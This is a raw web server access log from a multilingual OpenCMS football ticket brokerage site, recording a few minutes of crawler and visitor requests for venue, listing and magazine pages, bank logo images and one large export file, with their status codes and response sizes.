192.95.29.138 - - [29/Jun/2024:05:57:47 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=F06C0300-E27E-ED1B-C5C6-DEBEF815553B&sortorder=desc&column=price HTTP/1.1" 404 -
65.108.227.178 - - [29/Jun/2024:05:57:48 +0200] "GET /ticket2/opencms/de/fi/venue/?countryid=E687CC57-02FA-AF76-268E-C1A53D569993 HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:05:57:52 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=F06C0300-E27E-ED1B-C5C6-DEBEF815553B&sortorder=desc&column=row HTTP/1.1" 404 -
185.191.171.7 - - [29/Jun/2024:05:57:56 +0200] "GET /ticket2/opencms/nl/sport/voetbal-tickets/la_liga/villareal/ HTTP/1.1" 200 72678
192.95.29.138 - - [29/Jun/2024:05:57:56 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=F14CA03D-7B19-9875-743D-5167EB6FB9A9&sortorder=asc&column=price HTTP/1.1" 404 -
47.128.125.119 - - [29/Jun/2024:05:57:58 +0200] "GET /ticket2/opencms/it/buy/?edid=10C00DD9-2619-A832-C970-E24EDAAD57C7 HTTP/1.1" 200 73253
85.208.96.204 - - [29/Jun/2024:05:58:00 +0200] "GET /ticket2/opencms/en/sport/football-tickets/la-liga/real_betis/ HTTP/1.1" 200 73318
135.181.75.58 - - [29/Jun/2024:05:58:00 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76&catid=8E4972FC-6E2C-77A4-BB9D-D67BD270A641 HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:05:58:01 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=F14CA03D-7B19-9875-743D-5167EB6FB9A9&sortorder=asc&column=row HTTP/1.1" 404 -
47.128.125.119 - - [29/Jun/2024:05:58:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.125.119 - - [29/Jun/2024:05:58:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.125.119 - - [29/Jun/2024:05:58:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.125.119 - - [29/Jun/2024:05:58:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.125.119 - - [29/Jun/2024:05:58:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.125.119 - - [29/Jun/2024:05:58:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.125.119 - - [29/Jun/2024:05:58:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
192.95.29.138 - - [29/Jun/2024:05:58:05 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=F14CA03D-7B19-9875-743D-5167EB6FB9A9&sortorder=asc&column=section HTTP/1.1" 404 -
85.208.96.197 - - [29/Jun/2024:05:58:08 +0200] "GET /ticket2/opencms/sv/magazine/article?title=eredivisie HTTP/1.1" 200 77473
192.95.29.138 - - [29/Jun/2024:05:58:10 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FAAC48C3-7F66-8429-13B0-F7752278EC64&sortorder=desc&column=price HTTP/1.1" 404 -
47.128.60.63 - - [29/Jun/2024:05:58:13 +0200] "GET /ticket2/opencms/dk/buy/?catid=05A94519-01D1-C86F-9031-84936B0B9DAE&comcatid=66708183-7480-3365-06BF-DBF60280AB45 HTTP/1.1" 200 74266
66.249.75.162 - - [29/Jun/2024:05:58:14 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=145F87FE-BCE7-15CF-CE4F-3702933DA737 HTTP/1.1" 200 116893
47.128.60.63 - - [29/Jun/2024:05:58:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
192.95.29.138 - - [29/Jun/2024:05:58:14 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FAAC48C3-7F66-8429-13B0-F7752278EC64&sortorder=desc&column=section HTTP/1.1" 404 -
47.128.60.63 - - [29/Jun/2024:05:58:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
37.60.238.15 - - [29/Jun/2024:05:58:15 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=AF6FD165-4F1A-7FA7-C62D-5E8440EB560A HTTP/1.1" 404 -
47.128.60.63 - - [29/Jun/2024:05:58:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.60.63 - - [29/Jun/2024:05:58:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.60.63 - - [29/Jun/2024:05:58:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.60.63 - - [29/Jun/2024:05:58:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.60.63 - - [29/Jun/2024:05:58:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
135.181.75.58 - - [29/Jun/2024:05:58:18 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76&catid=A05A53F7-423D-23BE-575E-EA7B67DE22D9 HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:05:58:19 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FB3C343C-6AB6-461F-8218-82B4CC353AD4 HTTP/1.1" 404 -
54.36.148.133 - - [29/Jun/2024:05:58:23 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
192.95.29.138 - - [29/Jun/2024:05:58:29 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FB626257-F009-754B-29C0-9609C8BA12FE&sortorder=desc&column=row HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:05:58:35 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FB730AA6-A470-8EFB-27FE-924D530AC7B8&sortorder=desc&column=price HTTP/1.1" 404 -
135.181.75.58 - - [29/Jun/2024:05:58:42 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76&catid=AD8E612F-0F0B-03C9-5236-E4F8B6523945 HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:05:58:45 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FB730AA6-A470-8EFB-27FE-924D530AC7B8&sortorder=desc&column=section HTTP/1.1" 404 -
185.169.252.159 - - [29/Jun/2024:05:58:46 +0200] "GET /ticket2/opencms/sv/login/?edid=8A23E726-1974-5413-8366-4570BB38FB56 HTTP/1.1" 200 74250
51.222.253.19 - - [29/Jun/2024:05:58:49 +0200] "GET /ticket2/opencms/dk/venue/?venueid=B2083FF8-1A7E-AE58-2C4E-652F1B914C1A HTTP/1.1" 200 71782
192.95.29.138 - - [29/Jun/2024:05:58:52 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FB863E77-1EDD-3C8E-5548-64C9D2398F99 HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:05:58:56 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FB9C07E8-25C7-0E6C-87A2-CAD64ADBE697&sortorder=desc&column=price HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:05:59:03 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FB9C07E8-25C7-0E6C-87A2-CAD64ADBE697&sortorder=desc&column=row HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:05:59:07 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FB9C07E8-25C7-0E6C-87A2-CAD64ADBE697&sortorder=desc&column=section HTTP/1.1" 404 -
135.181.75.58 - - [29/Jun/2024:05:59:08 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76&catid=CB847559-7ECA-CC50-D7D2-064AF0C06FB1 HTTP/1.1" 404 -
37.60.238.15 - - [29/Jun/2024:05:59:09 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=AF7AB334-FB2A-404A-5CA9-FF51802C5A92 HTTP/1.1" 404 -
47.128.57.73 - - [29/Jun/2024:05:59:11 +0200] "GET /ticket2/opencms/nl/buy/?catid=43171577-14C8-6B19-25D9-DF372BFFCBFA&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 76186
192.95.29.138 - - [29/Jun/2024:05:59:12 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FBAFC8C9-2F07-B1EF-CF64-939CD8CFFE64 HTTP/1.1" 404 -
47.128.57.73 - - [29/Jun/2024:05:59:12 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
65.108.227.178 - - [29/Jun/2024:05:59:12 +0200] "GET /ticket2/opencms/de/fi/venue/?countryid=E6D1D9A5-7003-75BD-6D2C-CB60A7D92969 HTTP/1.1" 404 -
47.128.57.73 - - [29/Jun/2024:05:59:12 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.57.73 - - [29/Jun/2024:05:59:13 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.57.73 - - [29/Jun/2024:05:59:13 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.57.73 - - [29/Jun/2024:05:59:13 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.57.73 - - [29/Jun/2024:05:59:13 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.57.73 - - [29/Jun/2024:05:59:13 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
66.249.76.167 - - [29/Jun/2024:05:59:15 +0200] "GET /ticket2/opencms/en/search.html?searchQuery=liverpool&submit= HTTP/1.1" 200 111971
192.95.29.138 - - [29/Jun/2024:05:59:16 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FBAFC8C9-2F07-B1EF-CF64-939CD8CFFE64&sortorder=desc&column=row HTTP/1.1" 404 -
185.189.50.46 - - [29/Jun/2024:05:59:20 +0200] "GET /ticket2/tickets_export/outgoing/export.txt HTTP/1.1" 200 24554695
192.95.29.138 - - [29/Jun/2024:05:59:21 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FBAFC8C9-2F07-B1EF-CF64-939CD8CFFE64&sortorder=desc&column=section HTTP/1.1" 404 -
52.167.144.19 - - [29/Jun/2024:05:59:25 +0200] "GET /ticket2/opencms/fi/buy/?comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=757E2DFB-33DA-9B34-8402-9F06B19D8409 HTTP/1.1" 200 78398
192.95.29.138 - - [29/Jun/2024:05:59:25 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FC0D5D89-4B43-9EC1-BD89-FA48C772FEDC&sortorder=desc&column=price HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:05:59:30 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FC0D5D89-4B43-9EC1-BD89-FA48C772FEDC&sortorder=desc&column=row HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:05:59:36 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FC8E19AE-C0B2-6E8A-15B8-33A65B1EFF7E&sortorder=asc&column=row HTTP/1.1" 404 -
135.181.75.58 - - [29/Jun/2024:05:59:39 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76&catid=FCA7FF95-260A-464B-B6FF-A820FCE7DFEF HTTP/1.1" 404 -
185.191.171.2 - - [29/Jun/2024:05:59:40 +0200] "GET /ticket2/opencms/fi/magazine/ HTTP/1.1" 200 103772
192.95.29.138 - - [29/Jun/2024:05:59:42 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FCDEE0D5-8A78-E67A-3598-6D8F08248119&sortorder=desc&column=section HTTP/1.1" 404 -
65.108.227.178 - - [29/Jun/2024:05:59:49 +0200] "GET /ticket2/opencms/de/fi/venue/?countryid=E7631FE5-7061-8322-868B-F6085CDA8809 HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:05:59:50 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FE65CE07-7600-0CF6-1148-1B65F59F41F4&sortorder=desc&column=price HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:05:59:56 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FE65CE07-7600-0CF6-1148-1B65F59F41F4&sortorder=desc&column=row HTTP/1.1" 404 -
51.222.253.2 - - [29/Jun/2024:05:59:59 +0200] "GET /ticket2/opencms/en/venue/?venueid=50859568-726C-2D0D-904C-FF60FB4804EC HTTP/1.1" 200 71429
37.60.238.15 - - [29/Jun/2024:06:00:00 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=AF7F2E28-677E-9782-2141-5DA64832B7AA HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:00:01 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FE65CE07-7600-0CF6-1148-1B65F59F41F4&sortorder=desc&column=section HTTP/1.1" 404 -
135.181.75.58 - - [29/Jun/2024:06:00:03 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=66708183-7480-3365-06BF-DBF60280AB45 HTTP/1.1" 404 -
47.128.118.182 - - [29/Jun/2024:06:00:05 +0200] "GET /ticket2/opencms/it/buy/?catid=6CD184E8-C8D4-E1CC-33D0-6F47E3751240&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 78365
47.128.118.182 - - [29/Jun/2024:06:00:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.118.182 - - [29/Jun/2024:06:00:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.118.182 - - [29/Jun/2024:06:00:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.118.182 - - [29/Jun/2024:06:00:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.118.182 - - [29/Jun/2024:06:00:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.118.182 - - [29/Jun/2024:06:00:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.118.182 - - [29/Jun/2024:06:00:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
192.95.29.138 - - [29/Jun/2024:06:00:08 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FE9A8ACB-C8DC-2145-7856-06F77AC0FB07&sortorder=asc&column=price HTTP/1.1" 404 -
47.128.40.174 - - [29/Jun/2024:06:00:13 +0200] "GET /ticket2/opencms/fr/buy/?edid=72E12FE2-4DDC-1E5C-698A-850131DAAB42 HTTP/1.1" 200 72687
47.128.40.174 - - [29/Jun/2024:06:00:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.40.174 - - [29/Jun/2024:06:00:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.40.174 - - [29/Jun/2024:06:00:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.40.174 - - [29/Jun/2024:06:00:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.40.174 - - [29/Jun/2024:06:00:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.40.174 - - [29/Jun/2024:06:00:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.40.174 - - [29/Jun/2024:06:00:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
66.249.76.8 - - [29/Jun/2024:06:00:16 +0200] "GET /ticket2/opencms/sites/ticketbrokerage/sv/tickets/blackpool/stoke.html HTTP/1.1" 404 -
66.249.75.163 - - [29/Jun/2024:06:00:17 +0200] "GET /ticket2/opencms/dk/venue/?countryid=A07C6930-60EB-29AC-3FDB-C97CE816C6C1 HTTP/1.1" 200 101181
66.249.76.2 - - [29/Jun/2024:06:00:18 +0200] "GET /ticket2/opencms/dk/venue/?venueid=E7FBE66B-7C5F-E919-4130-134662E3910C HTTP/1.1" 200 71797
66.249.75.98 - - [29/Jun/2024:06:00:19 +0200] "GET /ticket2/opencms/dk/venue/?venueid=66CAA8A1-0259-F3AA-7522-0F138635803F HTTP/1.1" 200 71785
192.95.29.138 - - [29/Jun/2024:06:00:19 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FE9A8ACB-C8DC-2145-7856-06F77AC0FB07&sortorder=desc&column=row HTTP/1.1" 404 -
66.249.72.35 - - [29/Jun/2024:06:00:21 +0200] "GET /ticket2/opencms/dk/buy/?page=1&edid=C3C88BDA-1CC3-8611-4BC9-911B22C7161C HTTP/1.1" 200 87519
40.77.167.76 - - [29/Jun/2024:06:00:21 +0200] "GET /ticket2/opencms/no/magazine/article?title=villa-park-med-en-kapasitet-pa-over-42000-tilskuere HTTP/1.1" 200 76942
66.249.75.96 - - [29/Jun/2024:06:00:22 +0200] "GET /ticket2/opencms/dk/venue/?venueid=E472D4FD-D5DF-5700-717C-3F4C29267654 HTTP/1.1" 200 71821
66.249.75.162 - - [29/Jun/2024:06:00:23 +0200] "GET /ticket2/opencms/dk/venue/?venueid=8D532909-C41C-2A7C-5336-DE83887C261B HTTP/1.1" 200 71885
192.95.29.138 - - [29/Jun/2024:06:00:24 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FE9A8ACB-C8DC-2145-7856-06F77AC0FB07&sortorder=desc&column=section HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:00:28 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FEC9AA90-29F7-1503-8F87-89F5FA01BC28&sortorder=asc&column=price HTTP/1.1" 404 -
85.208.96.207 - - [29/Jun/2024:06:00:29 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/serie_a/inter/ HTTP/1.1" 200 74502
135.181.75.58 - - [29/Jun/2024:06:00:31 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=66708183-7480-3365-06BF-DBF60280AB45&catid=05A94519-01D1-C86F-9031-84936B0B9DAE HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:00:34 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FEC9AA90-29F7-1503-8F87-89F5FA01BC28&sortorder=asc&column=row HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:00:38 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FEE9109B-0F76-51E1-97FE-5F8D9CFFADB3&sortorder=asc&column=price HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:00:45 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FEE9109B-0F76-51E1-97FE-5F8D9CFFADB3&sortorder=asc&column=row HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:00:50 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FF0D3809-EDF7-7D77-577F-435AF719EB43&sortorder=asc&column=price HTTP/1.1" 404 -
65.108.227.178 - - [29/Jun/2024:06:00:50 +0200] "GET /ticket2/opencms/de/fi/venue/?countryid=E7736334-EC5F-4E42-8871-FF5303C85500 HTTP/1.1" 404 -
37.60.238.15 - - [29/Jun/2024:06:00:50 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=AFBD78E8-9F9A-1F1F-0693-EFD155D85FB4 HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:00:54 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FF0D3809-EDF7-7D77-577F-435AF719EB43&sortorder=asc&column=row HTTP/1.1" 404 -
135.181.75.58 - - [29/Jun/2024:06:00:54 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=66708183-7480-3365-06BF-DBF60280AB45&catid=30D5812D-0858-4843-8F45-C38AE504153C HTTP/1.1" 404 -
216.245.221.83 - - [29/Jun/2024:06:00:55 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [29/Jun/2024:06:00:58 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
192.95.29.138 - - [29/Jun/2024:06:00:59 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FF0D3809-EDF7-7D77-577F-435AF719EB43&sortorder=desc&column=price HTTP/1.1" 404 -
47.128.23.183 - - [29/Jun/2024:06:01:02 +0200] "GET /ticket2/opencms/fi/venue/?venueid=FFD58926-E43E-9E2E-9DB6-3170AF0A87CC HTTP/1.1" 200 72935
47.128.23.183 - - [29/Jun/2024:06:01:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
192.95.29.138 - - [29/Jun/2024:06:01:03 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FF2B86C5-202C-F6A1-F44E-1F4D4F393656&sortorder=desc&column=price HTTP/1.1" 404 -
47.128.23.183 - - [29/Jun/2024:06:01:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.23.183 - - [29/Jun/2024:06:01:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.23.183 - - [29/Jun/2024:06:01:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.23.183 - - [29/Jun/2024:06:01:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.23.183 - - [29/Jun/2024:06:01:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.23.183 - - [29/Jun/2024:06:01:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
85.208.96.202 - - [29/Jun/2024:06:01:06 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/bundesliga/borussia-dortmund/ HTTP/1.1" 200 73014
192.95.29.138 - - [29/Jun/2024:06:01:09 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FF2B86C5-202C-F6A1-F44E-1F4D4F393656&sortorder=desc&column=row HTTP/1.1" 404 -
51.222.253.9 - - [29/Jun/2024:06:01:09 +0200] "GET /ticket2/opencms/dk/venue/?venueid=6C55D1E9-72F5-889C-F1F5-1AEF3FBCF763 HTTP/1.1" 200 71788
85.208.96.211 - - [29/Jun/2024:06:01:10 +0200] "GET /ticket2/opencms/de/sport/fussball-tickets/ HTTP/1.1" 500 -
192.95.29.138 - - [29/Jun/2024:06:01:14 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FF2B86C5-202C-F6A1-F44E-1F4D4F393656&sortorder=desc&column=section HTTP/1.1" 404 -
135.181.75.58 - - [29/Jun/2024:06:01:18 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=66708183-7480-3365-06BF-DBF60280AB45&catid=8C381435-A1E8-94AF-2C58-D133FCA44A31 HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:01:18 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FF69DC98-99E2-FC49-3EB6-F7154192E9EB&sortorder=asc&column=price HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:01:23 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FF69DC98-99E2-FC49-3EB6-F7154192E9EB&sortorder=asc&column=row HTTP/1.1" 404 -
66.249.75.161 - - [29/Jun/2024:06:01:24 +0200] "GET /ticket2/opencms/sites/ticketbrokerage/nl/legal_info/ HTTP/1.1" 404 -
65.108.227.178 - - [29/Jun/2024:06:01:25 +0200] "GET /ticket2/opencms/de/fi/venue/?countryid=E83385F7-FB78-F065-4683-FDC212CE9BC4 HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:01:27 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FF69DC98-99E2-FC49-3EB6-F7154192E9EB&sortorder=asc&column=section HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:01:31 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FFB17C01-ED75-27AF-8C5A-B4FCC8F6A8DC HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:01:37 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FFB17C01-ED75-27AF-8C5A-B4FCC8F6A8DC&sortorder=desc&column=row HTTP/1.1" 404 -
37.60.238.15 - - [29/Jun/2024:06:01:42 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=B018F6AA-7433-F5A3-DE82-1992F037E01C HTTP/1.1" 404 -
135.181.75.58 - - [29/Jun/2024:06:01:43 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=810BB404-4103-77F2-A6C2-12D5E6C338E2 HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:01:43 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FFD295A3-4EEF-0AC4-F4B4-46E2317B286E HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:01:47 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=FFD295A3-4EEF-0AC4-F4B4-46E2317B286E&sortorder=desc&column=row HTTP/1.1" 404 -
65.108.227.178 - - [29/Jun/2024:06:01:51 +0200] "GET /ticket2/opencms/de/fi/venue/?countryid=EBCAD492-44DD-BA3B-65FF-004FBE418FEE HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:01:54 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=213A241C-CBD1-63CB-002B-7734E06AD58D&sortorder=desc&column=row HTTP/1.1" 404 -
47.128.118.177 - - [29/Jun/2024:06:01:58 +0200] "GET /ticket2/opencms/it/buy/?catid=AE3FE643-AE41-BAA6-237D-5206D1B044A1&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83418
47.128.118.177 - - [29/Jun/2024:06:01:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
